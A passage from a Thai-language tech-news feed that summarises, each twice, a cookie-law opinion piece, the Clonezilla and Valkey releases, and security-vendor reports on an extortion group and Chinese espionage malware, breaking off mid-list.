แนวคิดนี้ไม่ใช่เรื่องใหม่ เพราะเคยมีความพยายามทำ “Do Not Track” มาก่อน แต่ล้มเหลวเพราะเว็บไซต์ไม่ยอมทำตาม แต่ถ้ากฎหมายบังคับให้เบราว์เซอร์ต้องเคารพการตั้งค่าของผู้ใช้จริง ๆ ก็จะเปลี่ยนเกมได้เลย ✅ ปัญหาของระบบคุกกี้ปัจจุบัน ➡️ ผู้ใช้ต้องคลิกแบนเนอร์คุกกี้ซ้ำ ๆ ทุกเว็บไซต์ ➡️ เว็บไซต์ต้องลงทุนในระบบจัดการคุกกี้ที่ซับซ้อน ➡️ การยินยอมกลายเป็นแค่ “พิธีกรรม” ไม่ใช่การตัดสินใจอย่างมีข้อมูล ➡️ ผู้ใช้มักคลิก “Accept All” เพื่อให้เข้าเว็บได้เร็ว ๆ ✅ แนวคิดใหม่: ย้ายการควบคุมไปที่เบราว์เซอร์ ➡️ ผู้ใช้ตั้งค่าความเป็นส่วนตัวครั้งเดียวในเบราว์เซอร์ ➡️ เบราว์เซอร์จะบังคับใช้การตั้งค่านั้นกับทุกเว็บไซต์ ➡️ ลดภาระให้เว็บไซต์ ไม่ต้องสร้างแบนเนอร์หรือระบบจัดการคุกกี้ ➡️ หน่วยงานกำกับดูแลสามารถตรวจสอบเบราว์เซอร์ได้ง่ายกว่าเว็บไซต์ ✅ ตัวอย่างการตั้งค่าความเป็นส่วนตัวในเบราว์เซอร์ ➡️ “เฉพาะข้อมูลจำเป็น” – ใช้เฉพาะคุกกี้ที่จำเป็นต่อการทำงานของเว็บไซต์ ➡️ “วิเคราะห์การใช้งาน” – อนุญาตให้เก็บข้อมูลแบบไม่ระบุตัวตน ➡️ “โฆษณาแบบเฉพาะบุคคล” – อนุญาตให้ใช้ข้อมูลเพื่อแสดงโฆษณาที่ตรงกับความสนใจ ➡️ “กำหนดเอง” – ผู้ใช้เลือกได้ละเอียดตามประเภทข้อมูล ✅ ประโยชน์ของระบบใหม่ ➡️ ผู้ใช้ได้ประสบการณ์ที่ดีขึ้น ไม่ต้องเจอแบนเนอร์ ➡️ เว็บไซต์ลดต้นทุนและความซับซ้อนในการ comply ➡️ ระบบมีความโปร่งใสและตรวจสอบได้ง่ายขึ้น ➡️ ลดความเหลื่อมล้ำระหว่างเว็บไซต์ใหญ่กับเว็บไซต์เล็ก https://nednex.com/en/the-internets-biggest-annoyance-why-cookie-laws-should-target-browsers-not-websites/
    NEDNEX.COM
    The Internet's Biggest Annoyance:Why Cookie Laws Should Target Browsers, Not Websites | NEDNEX
    Save and Share: Click. Ugh. Another one. You know the drill. You land on a new website, eager to read an article or check a product price, and before the page even finishes loading, it appears: the dreaded cookie banner. A pop-up, a slide-in, a full-screen overlay demanding you “Accept All,” “Manage Preferences,” or navigate… Continue reading The Internet’s Biggest Annoyance:Why Cookie Laws Should Target Browsers, Not Websites
    0 Comments 0 Shares 109 Views 0 Reviews
  • “Clonezilla Live 3.3.0-33 มาแล้ว! รองรับการโคลน MTD และ eMMC พร้อมเครื่องมือใหม่เพียบ”

    Clonezilla Live เวอร์ชัน 3.3.0-33 เพิ่งเปิดตัว โดยเป็นระบบ live OS สำหรับการโคลนดิสก์และพาร์ทิชันที่อิงจาก Debian และใช้ Linux kernel 6.16 จุดเด่นของเวอร์ชันนี้คือการเพิ่มการรองรับการโคลนอุปกรณ์ MTD block และ eMMC boot ในโหมดผู้เชี่ยวชาญ (expert mode) ซึ่งเป็นประโยชน์มากสำหรับงาน embedded system และอุปกรณ์ IoT

    นอกจากนี้ยังมีเครื่องมือใหม่ชื่อว่า ocs-blkdev-sorter ที่ช่วยให้ udev สร้าง alias block device ใน /dev/ocs-disks/ ได้สะดวกขึ้น และ ocs-live-time-sync สำหรับซิงค์เวลาในระบบผ่าน ocs-live-netcfg

    ยังมีการเพิ่มตัวเลือก -uoab ใน ocs-sr และ ocs-live-feed-img เพื่อให้เลือก alias block device ได้จาก UI แบบข้อความ และเครื่องมือใหม่อีกหลายตัว เช่น ocs-cmd-screen-sample, ocs-live-gen-ubrd, และ ocs-blk-dev-info ที่ให้ข้อมูล block device ในรูปแบบ JSON

    ด้านระบบยังมีการเพิ่มแพ็กเกจสำคัญ เช่น atd, cron, upower, และ dhcpcd-base รวมถึงปรับปรุงการตั้งค่า locale และ keymap ให้เลือกได้จาก shell login โดยใช้ fbterm เป็นค่าเริ่มต้น

    สุดท้าย Clonezilla Live 3.3.0-33 ยังอัปเดตสคริปต์ต่าง ๆ เช่น ocs-iso-2-onie, ocs-cvt-dev, และ ocs-live-swap-kernel เพื่อรองรับการใช้งานที่ซับซ้อนมากขึ้น พร้อมปรับปรุงประสิทธิภาพและแก้บั๊กหลายจุด

    ความสามารถใหม่ใน Clonezilla Live 3.3.0-33
    รองรับการโคลน MTD block และ eMMC boot device ใน expert mode
    เพิ่ม ocs-blkdev-sorter สำหรับสร้าง alias block device
    เพิ่ม ocs-live-time-sync สำหรับซิงค์เวลา
    เพิ่ม ocs-cmd-screen-sample และ ocs-live-gen-ubrd
    เพิ่ม ocs-blk-dev-info สำหรับแสดงข้อมูล block device แบบ JSON

    การปรับปรุงระบบและ UI
    เพิ่มตัวเลือก -uoab ใน UI แบบข้อความ
    ปรับ locale และ keymap ให้เลือกจาก shell login ด้วย fbterm
    ปรับปรุง ocs-iso-2-onie, ocs-cvt-dev, ocs-live-swap-kernel
    เพิ่มการรองรับ CPU architecture ในชื่อไฟล์ ISO/ZIP
    ปรับปรุงการแสดงผลของ ocs-scan-disk และ ocs-get-dev-info

    แพ็กเกจและระบบพื้นฐาน
    เพิ่มแพ็กเกจ atd, cron, upower, dhcpcd-base
    ใช้ Debian Sid (ณ วันที่ 17 ต.ค. 2025) เป็นฐานระบบ
    อัปเดต Partclone เป็นเวอร์ชัน 0.3.38 (แก้บั๊กเกี่ยวกับ btrfs)
    ปรับ grub.cfg ให้ใช้ efitextmode 0
    เพิ่มกลไกตั้งค่า timezone จาก BIOS หากไม่มีอินเทอร์เน็ต

    https://9to5linux.com/clonezilla-live-3-3-0-33-adds-support-for-cloning-mtd-block-and-emmc-boot-devices
    💾 “Clonezilla Live 3.3.0-33 มาแล้ว! รองรับการโคลน MTD และ eMMC พร้อมเครื่องมือใหม่เพียบ” Clonezilla Live เวอร์ชัน 3.3.0-33 เพิ่งเปิดตัว โดยเป็นระบบ live OS สำหรับการโคลนดิสก์และพาร์ทิชันที่อิงจาก Debian และใช้ Linux kernel 6.16 จุดเด่นของเวอร์ชันนี้คือการเพิ่มการรองรับการโคลนอุปกรณ์ MTD block และ eMMC boot ในโหมดผู้เชี่ยวชาญ (expert mode) ซึ่งเป็นประโยชน์มากสำหรับงาน embedded system และอุปกรณ์ IoT นอกจากนี้ยังมีเครื่องมือใหม่ชื่อว่า ocs-blkdev-sorter ที่ช่วยให้ udev สร้าง alias block device ใน /dev/ocs-disks/ ได้สะดวกขึ้น และ ocs-live-time-sync สำหรับซิงค์เวลาในระบบผ่าน ocs-live-netcfg ยังมีการเพิ่มตัวเลือก -uoab ใน ocs-sr และ ocs-live-feed-img เพื่อให้เลือก alias block device ได้จาก UI แบบข้อความ และเครื่องมือใหม่อีกหลายตัว เช่น ocs-cmd-screen-sample, ocs-live-gen-ubrd, และ ocs-blk-dev-info ที่ให้ข้อมูล block device ในรูปแบบ JSON ด้านระบบยังมีการเพิ่มแพ็กเกจสำคัญ เช่น atd, cron, upower, และ dhcpcd-base รวมถึงปรับปรุงการตั้งค่า locale และ keymap ให้เลือกได้จาก shell login โดยใช้ fbterm เป็นค่าเริ่มต้น สุดท้าย Clonezilla Live 3.3.0-33 ยังอัปเดตสคริปต์ต่าง ๆ เช่น ocs-iso-2-onie, ocs-cvt-dev, และ ocs-live-swap-kernel เพื่อรองรับการใช้งานที่ซับซ้อนมากขึ้น พร้อมปรับปรุงประสิทธิภาพและแก้บั๊กหลายจุด ✅ ความสามารถใหม่ใน Clonezilla Live 3.3.0-33 ➡️ รองรับการโคลน MTD block และ eMMC boot device ใน expert mode ➡️ เพิ่ม ocs-blkdev-sorter สำหรับสร้าง alias block device ➡️ เพิ่ม ocs-live-time-sync สำหรับซิงค์เวลา ➡️ เพิ่ม ocs-cmd-screen-sample และ ocs-live-gen-ubrd ➡️ เพิ่ม ocs-blk-dev-info สำหรับแสดงข้อมูล block device แบบ JSON ✅ การปรับปรุงระบบและ UI ➡️ เพิ่มตัวเลือก -uoab ใน UI แบบข้อความ ➡️ ปรับ locale และ keymap ให้เลือกจาก shell login ด้วย fbterm ➡️ ปรับปรุง ocs-iso-2-onie, ocs-cvt-dev, ocs-live-swap-kernel ➡️ เพิ่มการรองรับ CPU architecture ในชื่อไฟล์ ISO/ZIP ➡️ ปรับปรุงการแสดงผลของ ocs-scan-disk และ ocs-get-dev-info ✅ แพ็กเกจและระบบพื้นฐาน ➡️ เพิ่มแพ็กเกจ atd, cron, upower, dhcpcd-base ➡️ ใช้ Debian Sid (ณ วันที่ 17 ต.ค. 2025) เป็นฐานระบบ ➡️ อัปเดต Partclone เป็นเวอร์ชัน 0.3.38 (แก้บั๊กเกี่ยวกับ btrfs) ➡️ ปรับ grub.cfg ให้ใช้ efitextmode 0 ➡️ เพิ่มกลไกตั้งค่า timezone จาก BIOS หากไม่มีอินเทอร์เน็ต https://9to5linux.com/clonezilla-live-3-3-0-33-adds-support-for-cloning-mtd-block-and-emmc-boot-devices
    9TO5LINUX.COM
    Clonezilla Live 3.3.0-33 Adds Support for Cloning MTD Block and eMMC Boot Devices - 9to5Linux
    Clonezilla Live 3.3.0-33 open-source and free disk cloning/imaging tool is now available for download with various changes and updated components.
    0 Comments 0 Shares 98 Views 0 Reviews
  • “Valkey 9.0 เปิดตัว – รองรับหลายฐานข้อมูลในคลัสเตอร์เดียว พร้อมทะลุ 1 พันล้านคำขอต่อวินาที!”

    Valkey ซึ่งเป็นฐานข้อมูล key-value แบบ in-memory ที่พัฒนาโดยชุมชนโอเพ่นซอร์สภายใต้ Linux Foundation ได้เปิดตัวเวอร์ชันใหม่ Valkey 9.0 ที่มาพร้อมฟีเจอร์เด็ด 3 อย่างที่แก้ปัญหาใหญ่ในระบบฐานข้อมูลแบบกระจาย (distributed database)

    ฟีเจอร์แรกคือ Atomic Slot Migration ที่ช่วยให้การย้ายข้อมูลระหว่างเซิร์ฟเวอร์ในคลัสเตอร์ทำได้แบบไม่มี downtime โดยใช้ snapshot และย้ายข้อมูลเบื้องหลังแบบเรียลไทม์

    ฟีเจอร์ที่สองคือ Hash Field Expiration ที่ให้ผู้ใช้สามารถตั้งเวลาให้ field ใน hash หมดอายุได้แบบแยก field ซึ่งช่วยลดการใช้หน่วยความจำและไม่ต้องลบข้อมูลด้วยตัวเองอีกต่อไป

    ฟีเจอร์สุดท้ายคือ Multiple Databases in Cluster Mode ที่ให้รันหลายฐานข้อมูลแยกกันในคลัสเตอร์เดียว เช่น staging กับ production โดยไม่ต้องตั้งโครงสร้างใหม่

    ด้านประสิทธิภาพ Valkey 9.0 เร็วขึ้นกว่าเดิมถึง 40% และบางคำสั่งเร็วขึ้นถึง 200% โดยสามารถรองรับได้มากกว่า 1 พันล้านคำขอต่อวินาที บนคลัสเตอร์ 2,000 โหนด

    Madelyn Olson ผู้ดูแลโครงการเผยว่า Valkey 9.0 เปิดตัวช้ากว่ากำหนดเพราะมีข้อเสนอจากชุมชนจำนวนมาก แต่ทีมงานก็พยายามปรับปรุงกระบวนการให้ตอบสนองได้เร็วขึ้นในอนาคต พร้อมย้ำว่าโค้ดของ Valkey จะยังคงเปิดให้ทุกคนเข้าถึงได้เสมอ

    ฟีเจอร์ใหม่ใน Valkey 9.0
    Atomic Slot Migration – ย้ายข้อมูลระหว่างเซิร์ฟเวอร์แบบไม่มี downtime
    Hash Field Expiration – ตั้งเวลาให้ field หมดอายุได้แบบแยก field
    Multiple Databases in Cluster Mode – รันหลายฐานข้อมูลในคลัสเตอร์เดียว

    ประสิทธิภาพที่เพิ่มขึ้น
    เร็วขึ้นกว่า Valkey 8.1 ถึง 40%
    บางคำสั่งเร็วขึ้นถึง 200%
    รองรับมากกว่า 1 พันล้านคำขอ/วินาที บนคลัสเตอร์ 2,000 โหนด

    ความเห็นจากผู้ดูแลโครงการ
    เปิดตัวช้ากว่ากำหนดเพราะมีข้อเสนอจากชุมชนจำนวนมาก
    ทีมงานปรับปรุงกระบวนการเพื่อรองรับการพัฒนาในอนาคต
    ยืนยันว่า Valkey จะยังคงเป็นโอเพ่นซอร์สภายใต้ Linux Foundation
    การเปิดโค้ดช่วยให้ผู้ใช้ไม่ถูกล็อกด้วยเครื่องมือ proprietary

    ความเคลื่อนไหวในวงการ
    Redis 8 กลับมาเปิดซอร์สอีกครั้งภายใต้ AGPL
    Valkey ย้ำจุดยืนเรื่องความโปร่งใสและการเติบโตจากชุมชน
    การเปิดตัว Valkey 9.0 สะท้อนพลังของการพัฒนาแบบโอเพ่นซอร์ส

    https://news.itsfoss.com/valkey-9-release/
    🚀 “Valkey 9.0 เปิดตัว – รองรับหลายฐานข้อมูลในคลัสเตอร์เดียว พร้อมทะลุ 1 พันล้านคำขอต่อวินาที!” Valkey ซึ่งเป็นฐานข้อมูล key-value แบบ in-memory ที่พัฒนาโดยชุมชนโอเพ่นซอร์สภายใต้ Linux Foundation ได้เปิดตัวเวอร์ชันใหม่ Valkey 9.0 ที่มาพร้อมฟีเจอร์เด็ด 3 อย่างที่แก้ปัญหาใหญ่ในระบบฐานข้อมูลแบบกระจาย (distributed database) ฟีเจอร์แรกคือ Atomic Slot Migration ที่ช่วยให้การย้ายข้อมูลระหว่างเซิร์ฟเวอร์ในคลัสเตอร์ทำได้แบบไม่มี downtime โดยใช้ snapshot และย้ายข้อมูลเบื้องหลังแบบเรียลไทม์ ฟีเจอร์ที่สองคือ Hash Field Expiration ที่ให้ผู้ใช้สามารถตั้งเวลาให้ field ใน hash หมดอายุได้แบบแยก field ซึ่งช่วยลดการใช้หน่วยความจำและไม่ต้องลบข้อมูลด้วยตัวเองอีกต่อไป ฟีเจอร์สุดท้ายคือ Multiple Databases in Cluster Mode ที่ให้รันหลายฐานข้อมูลแยกกันในคลัสเตอร์เดียว เช่น staging กับ production โดยไม่ต้องตั้งโครงสร้างใหม่ ด้านประสิทธิภาพ Valkey 9.0 เร็วขึ้นกว่าเดิมถึง 40% และบางคำสั่งเร็วขึ้นถึง 200% โดยสามารถรองรับได้มากกว่า 1 พันล้านคำขอต่อวินาที บนคลัสเตอร์ 2,000 โหนด Madelyn Olson ผู้ดูแลโครงการเผยว่า Valkey 9.0 เปิดตัวช้ากว่ากำหนดเพราะมีข้อเสนอจากชุมชนจำนวนมาก แต่ทีมงานก็พยายามปรับปรุงกระบวนการให้ตอบสนองได้เร็วขึ้นในอนาคต พร้อมย้ำว่าโค้ดของ Valkey จะยังคงเปิดให้ทุกคนเข้าถึงได้เสมอ ✅ ฟีเจอร์ใหม่ใน Valkey 9.0 ➡️ Atomic Slot Migration – ย้ายข้อมูลระหว่างเซิร์ฟเวอร์แบบไม่มี downtime ➡️ Hash Field Expiration – ตั้งเวลาให้ field หมดอายุได้แบบแยก field ➡️ Multiple Databases in Cluster Mode – รันหลายฐานข้อมูลในคลัสเตอร์เดียว ✅ ประสิทธิภาพที่เพิ่มขึ้น ➡️ เร็วขึ้นกว่า Valkey 8.1 ถึง 40% ➡️ บางคำสั่งเร็วขึ้นถึง 200% ➡️ รองรับมากกว่า 1 พันล้านคำขอ/วินาที บนคลัสเตอร์ 2,000 โหนด ✅ ความเห็นจากผู้ดูแลโครงการ ➡️ เปิดตัวช้ากว่ากำหนดเพราะมีข้อเสนอจากชุมชนจำนวนมาก ➡️ ทีมงานปรับปรุงกระบวนการเพื่อรองรับการพัฒนาในอนาคต ➡️ ยืนยันว่า Valkey จะยังคงเป็นโอเพ่นซอร์สภายใต้ Linux Foundation ➡️ การเปิดโค้ดช่วยให้ผู้ใช้ไม่ถูกล็อกด้วยเครื่องมือ proprietary ✅ ความเคลื่อนไหวในวงการ ➡️ Redis 8 กลับมาเปิดซอร์สอีกครั้งภายใต้ AGPL ➡️ Valkey ย้ำจุดยืนเรื่องความโปร่งใสและการเติบโตจากชุมชน ➡️ การเปิดตัว Valkey 9.0 สะท้อนพลังของการพัฒนาแบบโอเพ่นซอร์ส https://news.itsfoss.com/valkey-9-release/
    NEWS.ITSFOSS.COM
    Valkey 9.0 Adds Multi-Database Clusters, Supports 1 Billion Requests Per Second
    New release brings 40% throughput increase and seamless zero-downtime resharding.
    0 Comments 0 Shares 99 Views 0 Reviews
  • “Scattered LAPSUS$ Hunters เปลี่ยนกลยุทธ์ – เปิดบริการ EaaS และล่าคนวงใน หลังแฮก Salesforce!”

    นักวิจัยจาก Unit 42 ของ Palo Alto Networks พบว่ากลุ่มแฮกเกอร์ชื่อ Scattered LAPSUS$ Hunters ซึ่งเชื่อมโยงกับ Bling Libra syndicate กำลังเปลี่ยนกลยุทธ์จากการใช้ ransomware มาเป็น Extortion-as-a-Service (EaaS) คือเน้นขโมยข้อมูลแล้วเรียกค่าไถ่โดยไม่เข้ารหัสไฟล์

    หลังจากแฮก Salesforce และขโมยข้อมูลกว่า 1 พันล้านรายการ พวกเขาเริ่มรุกหนัก โดยเปิด Telegram channel ชื่อ “SLSH 6.0 part 3” เพื่อโชว์ข้อมูลที่ขโมยมา และประกาศว่า “จะไม่ปล่อยข้อมูลเพิ่ม เพราะสิ่งที่มีอยู่มันร้ายแรงเกินกว่าจะเปิดเผย”

    กลุ่มนี้ยังเปิดรับสมัคร “คนวงใน” จากบริษัทต่าง ๆ เช่น call center, gaming, SaaS, telecom และ hosting provider ในหลายประเทศ เพื่อให้พนักงานขาย credentials หรือเข้าถึงระบบภายในได้ง่ายขึ้น

    ที่น่าสนใจคือพวกเขา tease ว่ากำลังพัฒนา ransomware ตัวใหม่ชื่อ SHINYSP1D3R ซึ่งอาจเป็นแค่เครื่องมือสร้างภาพลักษณ์เพื่อดึง affiliate เข้าร่วม EaaS มากกว่าจะใช้จริง เพราะจนถึงตอนนี้ยังไม่มีการเข้ารหัสไฟล์จากกลุ่มนี้เลย

    Unit 42 ยังพบว่าเว็บไซต์ data leak ของกลุ่มถูก deface และไม่สามารถยืนยันได้ว่าข้อมูลยังอยู่หรือไม่ ซึ่งอาจเป็นผลจากแรงกดดันจากหน่วยงานรัฐหรือความเสี่ยงทางกฎหมาย

    กลยุทธ์ใหม่ของ Scattered LAPSUS$ Hunters
    เปลี่ยนจาก ransomware เป็น Extortion-as-a-Service (EaaS)
    ขโมยข้อมูลแล้วเรียกค่าไถ่โดยไม่เข้ารหัส
    ลดความเสี่ยงจากการถูกไล่ล่าทางกฎหมาย
    ใช้ Telegram channel เป็นช่องทางสื่อสารและโชว์ข้อมูล

    การล่าคนวงใน
    เปิดรับสมัครพนักงานจากหลายอุตสาหกรรม
    เน้น call center, gaming, SaaS, telecom และ hosting provider
    ใช้ insider access เพื่อ bypass ระบบรักษาความปลอดภัย
    คล้ายกับกลยุทธ์ของกลุ่ม Muddled Libra (Scattered Spider)

    การ tease ransomware ใหม่
    ชื่อว่า SHINYSP1D3R
    อาจเป็นแค่เครื่องมือสร้างภาพลักษณ์
    ยังไม่มีหลักฐานการเข้ารหัสไฟล์
    อาจใช้เพื่อดึง affiliate เข้าร่วม EaaS

    ความเคลื่อนไหวล่าสุด
    ข้อมูลจาก 6 องค์กรถูกปล่อยหลัง deadline
    รวมถึง PII เช่น ชื่อ, วันเกิด, เบอร์โทร, ข้อมูล frequent flyer
    เว็บไซต์ data leak ถูก deface ไม่สามารถเข้าถึงได้
    กลุ่มประกาศว่าจะไม่ปล่อยข้อมูลเพิ่ม

    https://securityonline.info/scattered-lapsus-hunters-pivot-to-eaas-launch-insider-recruitment-campaign-after-salesforce-extortion/
    🕶️ “Scattered LAPSUS$ Hunters เปลี่ยนกลยุทธ์ – เปิดบริการ EaaS และล่าคนวงใน หลังแฮก Salesforce!” นักวิจัยจาก Unit 42 ของ Palo Alto Networks พบว่ากลุ่มแฮกเกอร์ชื่อ Scattered LAPSUS$ Hunters ซึ่งเชื่อมโยงกับ Bling Libra syndicate กำลังเปลี่ยนกลยุทธ์จากการใช้ ransomware มาเป็น Extortion-as-a-Service (EaaS) คือเน้นขโมยข้อมูลแล้วเรียกค่าไถ่โดยไม่เข้ารหัสไฟล์ หลังจากแฮก Salesforce และขโมยข้อมูลกว่า 1 พันล้านรายการ พวกเขาเริ่มรุกหนัก โดยเปิด Telegram channel ชื่อ “SLSH 6.0 part 3” เพื่อโชว์ข้อมูลที่ขโมยมา และประกาศว่า “จะไม่ปล่อยข้อมูลเพิ่ม เพราะสิ่งที่มีอยู่มันร้ายแรงเกินกว่าจะเปิดเผย” กลุ่มนี้ยังเปิดรับสมัคร “คนวงใน” จากบริษัทต่าง ๆ เช่น call center, gaming, SaaS, telecom และ hosting provider ในหลายประเทศ เพื่อให้พนักงานขาย credentials หรือเข้าถึงระบบภายในได้ง่ายขึ้น ที่น่าสนใจคือพวกเขา tease ว่ากำลังพัฒนา ransomware ตัวใหม่ชื่อ SHINYSP1D3R ซึ่งอาจเป็นแค่เครื่องมือสร้างภาพลักษณ์เพื่อดึง affiliate เข้าร่วม EaaS มากกว่าจะใช้จริง เพราะจนถึงตอนนี้ยังไม่มีการเข้ารหัสไฟล์จากกลุ่มนี้เลย Unit 42 ยังพบว่าเว็บไซต์ data leak ของกลุ่มถูก deface และไม่สามารถยืนยันได้ว่าข้อมูลยังอยู่หรือไม่ ซึ่งอาจเป็นผลจากแรงกดดันจากหน่วยงานรัฐหรือความเสี่ยงทางกฎหมาย ✅ กลยุทธ์ใหม่ของ Scattered LAPSUS$ Hunters ➡️ เปลี่ยนจาก ransomware เป็น Extortion-as-a-Service (EaaS) ➡️ ขโมยข้อมูลแล้วเรียกค่าไถ่โดยไม่เข้ารหัส ➡️ ลดความเสี่ยงจากการถูกไล่ล่าทางกฎหมาย ➡️ ใช้ Telegram channel เป็นช่องทางสื่อสารและโชว์ข้อมูล ✅ การล่าคนวงใน ➡️ เปิดรับสมัครพนักงานจากหลายอุตสาหกรรม ➡️ เน้น call center, gaming, SaaS, telecom และ hosting provider ➡️ ใช้ insider access เพื่อ bypass ระบบรักษาความปลอดภัย ➡️ คล้ายกับกลยุทธ์ของกลุ่ม Muddled Libra (Scattered Spider) ✅ การ tease ransomware ใหม่ ➡️ ชื่อว่า SHINYSP1D3R ➡️ อาจเป็นแค่เครื่องมือสร้างภาพลักษณ์ ➡️ ยังไม่มีหลักฐานการเข้ารหัสไฟล์ ➡️ อาจใช้เพื่อดึง affiliate เข้าร่วม EaaS ✅ ความเคลื่อนไหวล่าสุด ➡️ ข้อมูลจาก 6 องค์กรถูกปล่อยหลัง deadline ➡️ รวมถึง PII เช่น ชื่อ, วันเกิด, เบอร์โทร, ข้อมูล frequent flyer ➡️ เว็บไซต์ data leak ถูก deface ไม่สามารถเข้าถึงได้ ➡️ กลุ่มประกาศว่าจะไม่ปล่อยข้อมูลเพิ่ม https://securityonline.info/scattered-lapsus-hunters-pivot-to-eaas-launch-insider-recruitment-campaign-after-salesforce-extortion/
    SECURITYONLINE.INFO
    Scattered LAPSUS$ Hunters Pivot to EaaS, Launch Insider Recruitment Campaign After Salesforce Extortion
    Unit 42 exposed Scattered LAPSUS$ Hunters pivoting to Extortion-as-a-Service (EaaS) after Salesforce leaks. The group is recruiting insiders and teasing SHINYSP1D3R ransomware on Telegram.
    0 Comments 0 Shares 94 Views 0 Reviews
  • “Symantec แฉแคมเปญจารกรรมจีน – ใช้ Zingdoor, ShadowPad และ KrustyLoader เจาะหน่วยงานทั่วโลก!”

    Symantec เปิดเผยแคมเปญจารกรรมไซเบอร์ระดับโลกที่มีความเชื่อมโยงกับกลุ่ม APT ของจีนหลายกลุ่ม โดยพบการใช้เครื่องมือมัลแวร์ที่ซับซ้อน ได้แก่ Zingdoor, ShadowPad และ KrustyLoader ซึ่งเคยถูกใช้โดยกลุ่ม Glowworm (Earth Estries) และ UNC5221 มาก่อน

    แคมเปญนี้เจาะระบบของหน่วยงานรัฐบาลในอเมริกาใต้และมหาวิทยาลัยในสหรัฐฯ โดยใช้ช่องโหว่ใน SQL Server และ Apache HTTP เป็นจุดเริ่มต้น จากนั้นฝัง DLL อันตรายผ่าน binary ที่ดูเหมือนซอฟต์แวร์ของ Symantec เพื่อหลบการตรวจจับ

    Zingdoor เป็น backdoor ที่เขียนด้วย Go สามารถเก็บข้อมูลระบบ, อัปโหลด/ดาวน์โหลดไฟล์ และรันคำสั่งได้ โดยถูก sideload ผ่าน binary ของ Trend Micro เพื่อให้ดูเหมือนโปรแกรมปกติ

    ShadowPad เป็น Remote Access Trojan (RAT) แบบ modular ที่สามารถโหลดโมดูลใหม่ได้ตามต้องการ ใช้ DLL sideloading เพื่อซ่อนตัว และถูกใช้โดยหลายกลุ่ม APT ของจีน เช่น APT41, Blackfly และ Grayfly

    KrustyLoader เป็น dropper ที่เขียนด้วย Rust มีฟีเจอร์ anti-analysis และ self-delete ก่อนจะโหลด payload ขั้นที่สอง เช่น Sliver C2 framework ซึ่งใช้ควบคุมระบบจากระยะไกล

    นอกจากมัลแวร์เฉพาะทางแล้ว แฮกเกอร์ยังใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Procdump, Revsocks และ PetitPotam เพื่อขโมย credentials และยกระดับสิทธิ์ในระบบ

    Symantec ระบุว่าการโจมตีนี้เกี่ยวข้องกับการใช้ช่องโหว่ ToolShell ที่ Microsoft เคยรายงาน โดยพบว่ามีการใช้จากกลุ่มอื่นนอกเหนือจาก Budworm, Sheathminer และ Storm-2603 ซึ่งแสดงให้เห็นถึง ecosystem การโจมตีที่กว้างกว่าที่เคยคิด

    เครื่องมือมัลแวร์ที่ใช้ในแคมเปญ
    Zingdoor – backdoor เขียนด้วย Go ใช้ sideload ผ่าน Trend Micro
    ShadowPad – modular RAT ที่โหลดโมดูลใหม่ได้ ใช้ DLL sideloading
    KrustyLoader – Rust-based dropper ที่โหลด Sliver C2 framework
    ใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Revsocks, Procdump
    ใช้ PetitPotam เพื่อขโมย credentials จาก domain controller

    กลุ่ม APT ที่เกี่ยวข้อง
    Glowworm (Earth Estries), FamousSparrow
    UNC5221 – กลุ่มที่มีความเชื่อมโยงกับจีน
    APT41, Blackfly, Grayfly – ใช้ ShadowPad
    REF3927 – กลุ่มใหม่ที่ใช้ ToolShell ร่วมกับกลุ่มอื่น

    เป้าหมายของการโจมตี
    หน่วยงานรัฐบาลในอเมริกาใต้
    มหาวิทยาลัยในสหรัฐฯ
    ระบบ SharePoint ที่มีช่องโหว่
    เป้าหมายเชิงยุทธศาสตร์ที่มีข้อมูลสำคัญ
    สร้างการเข้าถึงระยะยาวและขโมยข้อมูลอย่างต่อเนื่อง

    https://securityonline.info/symantec-exposes-chinese-apt-overlap-zingdoor-shadowpad-and-krustyloader-used-in-global-espionage/
    🕵️‍♀️ “Symantec แฉแคมเปญจารกรรมจีน – ใช้ Zingdoor, ShadowPad และ KrustyLoader เจาะหน่วยงานทั่วโลก!” Symantec เปิดเผยแคมเปญจารกรรมไซเบอร์ระดับโลกที่มีความเชื่อมโยงกับกลุ่ม APT ของจีนหลายกลุ่ม โดยพบการใช้เครื่องมือมัลแวร์ที่ซับซ้อน ได้แก่ Zingdoor, ShadowPad และ KrustyLoader ซึ่งเคยถูกใช้โดยกลุ่ม Glowworm (Earth Estries) และ UNC5221 มาก่อน แคมเปญนี้เจาะระบบของหน่วยงานรัฐบาลในอเมริกาใต้และมหาวิทยาลัยในสหรัฐฯ โดยใช้ช่องโหว่ใน SQL Server และ Apache HTTP เป็นจุดเริ่มต้น จากนั้นฝัง DLL อันตรายผ่าน binary ที่ดูเหมือนซอฟต์แวร์ของ Symantec เพื่อหลบการตรวจจับ Zingdoor เป็น backdoor ที่เขียนด้วย Go สามารถเก็บข้อมูลระบบ, อัปโหลด/ดาวน์โหลดไฟล์ และรันคำสั่งได้ โดยถูก sideload ผ่าน binary ของ Trend Micro เพื่อให้ดูเหมือนโปรแกรมปกติ ShadowPad เป็น Remote Access Trojan (RAT) แบบ modular ที่สามารถโหลดโมดูลใหม่ได้ตามต้องการ ใช้ DLL sideloading เพื่อซ่อนตัว และถูกใช้โดยหลายกลุ่ม APT ของจีน เช่น APT41, Blackfly และ Grayfly KrustyLoader เป็น dropper ที่เขียนด้วย Rust มีฟีเจอร์ anti-analysis และ self-delete ก่อนจะโหลด payload ขั้นที่สอง เช่น Sliver C2 framework ซึ่งใช้ควบคุมระบบจากระยะไกล นอกจากมัลแวร์เฉพาะทางแล้ว แฮกเกอร์ยังใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Procdump, Revsocks และ PetitPotam เพื่อขโมย credentials และยกระดับสิทธิ์ในระบบ Symantec ระบุว่าการโจมตีนี้เกี่ยวข้องกับการใช้ช่องโหว่ ToolShell ที่ Microsoft เคยรายงาน โดยพบว่ามีการใช้จากกลุ่มอื่นนอกเหนือจาก Budworm, Sheathminer และ Storm-2603 ซึ่งแสดงให้เห็นถึง ecosystem การโจมตีที่กว้างกว่าที่เคยคิด ✅ เครื่องมือมัลแวร์ที่ใช้ในแคมเปญ ➡️ Zingdoor – backdoor เขียนด้วย Go ใช้ sideload ผ่าน Trend Micro ➡️ ShadowPad – modular RAT ที่โหลดโมดูลใหม่ได้ ใช้ DLL sideloading ➡️ KrustyLoader – Rust-based dropper ที่โหลด Sliver C2 framework ➡️ ใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Revsocks, Procdump ➡️ ใช้ PetitPotam เพื่อขโมย credentials จาก domain controller ✅ กลุ่ม APT 